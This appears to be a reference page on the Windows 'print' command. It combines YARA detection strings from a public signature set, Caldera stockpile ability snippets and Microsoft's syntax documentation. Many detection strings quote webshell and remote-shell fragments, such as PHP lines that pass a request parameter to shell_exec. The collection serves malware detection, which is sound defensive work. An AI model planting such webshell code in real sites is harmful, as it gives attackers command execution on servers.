signature-base apt_pulsesecure.yar $r3 = /if[\x09\x20]{0,32}($\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27])\s{0,128}{\s{1,128}print[\x09\x20]{0,32}[\x22\x27]Content-type/ CC BY-NC 4.0
signature-base apt_pulsesecure.yar $s4 = “print $_” CC BY-NC 4.0
signature-base apt_pulsesecure.yar $s6 = “print MIME::Base64::encode(RC4(“ CC BY-NC 4.0
signature-base apt_sandworm_centreon.yar $pl_socket = “socket(SOCKET, PF_INET, SOCK_STREAM,$tcp) or die print "$l$e$!$l” CC BY-NC 4.0
signature-base apt_sandworm_centreon.yar $msg1 = “print "$l OK! I\‘m successful connected.$l"” CC BY-NC 4.0
signature-base apt_sandworm_centreon.yar $msg2 = “print "$l OK! I\‘m accept connection.$l"” CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s0 = “print "[] Connected to remote host \n"; “ fullword ascii / PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s1 = “print "Usage: $0 [Host] [Port] \n\n"; “ fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s5 = “print "[] Resolving HostName\n"; “ fullword ascii / PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base exploit_shitrix.yar $s07 = “template.new({‘BLOCK’=’print readpipe(“ ascii /* TrustedSec templae */ CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s3 = “out.print("Hi,Man 2015
");” fullword ascii		 CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s6 = “out.print("</pre>");” fullword ascii CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s7 = “out.print("<pre>");” fullword ascii CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s4 = “out.print("Hi,Man 2015");” fullword ascii CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&” CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “ out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7” CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “</font><%out.print(request.getRealPath(request.getServletPath())); %>” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “print "<form action=\"".$me."?p=cmd&dir=".realpath(‘.’)."” CC BY-NC 4.0
signature-base thor-webshells.yar $s8 = “print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di” CC BY-NC 4.0
signature-base thor-webshells.yar $s1 = “print "\n".’Tip: to view the file "as is" - open the page in <a href="‘.Dx” CC BY-NC 4.0
signature-base thor-webshells.yar $s9 = “if(cmd.equals("Szh0ZWFt")){out.print("[S]"+dir+"[E]");}” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “out.print(") <A Style=’Color: " + fcolor.toString() + ";’ HRef=’?file=" + fn” CC BY-NC 4.0
signature-base thor-webshells.yar $s7 = “if(flist[i].canRead() == true) out.print("r" ); else out.print("-");” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s5 = “print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam” CC BY-NC 4.0
signature-base thor-webshells.yar $s8 = “print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </” CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “python -c"import md5;x=md5.new(‘you_password’);print x.hexdigest()"” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “print "\n".’Tip: to view the file "as is" - open the page in <a href="‘.Dx” CC BY-NC 4.0
signature-base thor-webshells.yar $s1 = “print "Sending mail to $to……. ";” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "Asmodeus Perl Remote Shell” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "\n".’<tr><td width=100pt class=linelisting>POST (php eval)</td><" CC BY-NC 4.0
signature-base thor-webshells.yar $s1 = “print "<tr><td>Server is:</td><td>".$_SERVER[‘SERVER_SIGNATURE’]."</td” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "<tr><td>Execute command:</td><td><input size=100 name=\"_cmd” CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “print "error; help: head -n 16 d00r.py"” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “print "PW:",PW,"PORT:",PORT,"HOST:",HOST” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print("
Provenance du mail : <input type=\"text\" name=\"provenanc”		 CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “<? if($cmd != "") print Shell_Exec($cmd);?>” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s8 = “print "<form action=\"".$me."?p=chmod&file=".$content."&d” CC BY-NC 4.0
signature-base thor-webshells.yar $s18 = “print shell_exec($command);” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s5 = “print "
<h1>#worst @dal.net</h1>
";” fullword		 CC BY-NC 4.0
signature-base thor-webshells.yar $s7 = “print "
<h1>Linux Shells</h1>
";” fullword		 CC BY-NC 4.0
signature-base thor-webshells.yar $s14 = “print "<tr><td>System type:</td><td>$UName</td></tr>";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s20 = “print "Transfered $TargetFileSize Bytes.
";” fullword		 CC BY-NC 4.0
signature-base thor-webshells.yar $s12 = “print "Sending mail to $to……. "; “ fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “<? if($cmd != "") print Shell_Exec($cmd);?>” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s12 = “print « "[kalabanga]";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s5 = “print "
[ Generation time: \".round(getTime()-startTime,4).\" second"
 CC BY-NC 4.0
signature-base thor-webshells.yar $s6 = “print "Sorry, none of the command functions works.";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “print("<p align=\"center\"><font size=\"5\">Exploit include “ CC BY-NC 4.0
stockpile b007fe0c-c6b0-4fda-915c-255bbc070de2.yml description: copy the contents for the clipboard and print them Apache-2.0
stockpile 6c91884e-11ec-422f-a6ed-e76774b0daac.yml - source: host.print.file Apache-2.0
stockpile 6c91884e-11ec-422f-a6ed-e76774b0daac.yml target: host.print.size Apache-2.0
stockpile 6e1a53c0-7352-4899-be35-fa7f364d5722.yml name: Print Working Directory Apache-2.0
stockpile 6e1a53c0-7352-4899-be35-fa7f364d5722.yml description: Print the current working directory on the system Apache-2.0
stockpile a41c2324-8c63-4b15-b3c5-84f920d1f226.yml command: 'find ~ -type f -name #{host.print.file} 2>/dev/null' Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.

print

Sends a text file to a printer. A file can print in the background if you send it to a printer connected to a serial or parallel port on the local computer.

[!NOTE] You can perform many configuration tasks from the command prompt by using the Mode command, including configuring a printer connected to a parallel or a serial port, displaying printer status, or preparing a printer for code page switching.

Syntax

print [/d:<printername>] [<drive>:][<path>]<filename>[ ...]

Parameters

Parameter Description
/d:<printername> Specifies the printer that you want to print the job. To print to a locally connected printer, specify the port on your computer where the printer is connected. Valid values for parallel ports are LPT1, LPT2, and LPT3. Valid values for serial ports are COM1, COM2, COM3, and COM4. You can also specify a network printer by using its queue name (\\server_name\printer_name). If you don’t specify a printer, the print job is sent to LPT1 by default.
<drive>: Specifies the logical or physical drive where the file you want to print is located. This parameter isn’t required if the file you want to print is located on the current drive.
<path> Specifies the location of the file you want to print. This parameter isn’t required if the file you want to print is located in the current directory.
<filename>[ ...] Required. Specifies the file you want to print. You can include multiple files in one command.
/? Displays help at the command prompt.

Examples

To send the report.txt file, located in the current directory, to a printer connected to lpt2 on the local computer, type:

print /d:lpt2 report.txt

To send the report.txt file, located in the c:\accounting directory, to the printer1 print queue on the /d:\copyroom server, type:

print /d:\\copyroom\printer1 c:\accounting\report.txt

Additional References

MIT License. Copyright (c) 2020-2021 Strontic.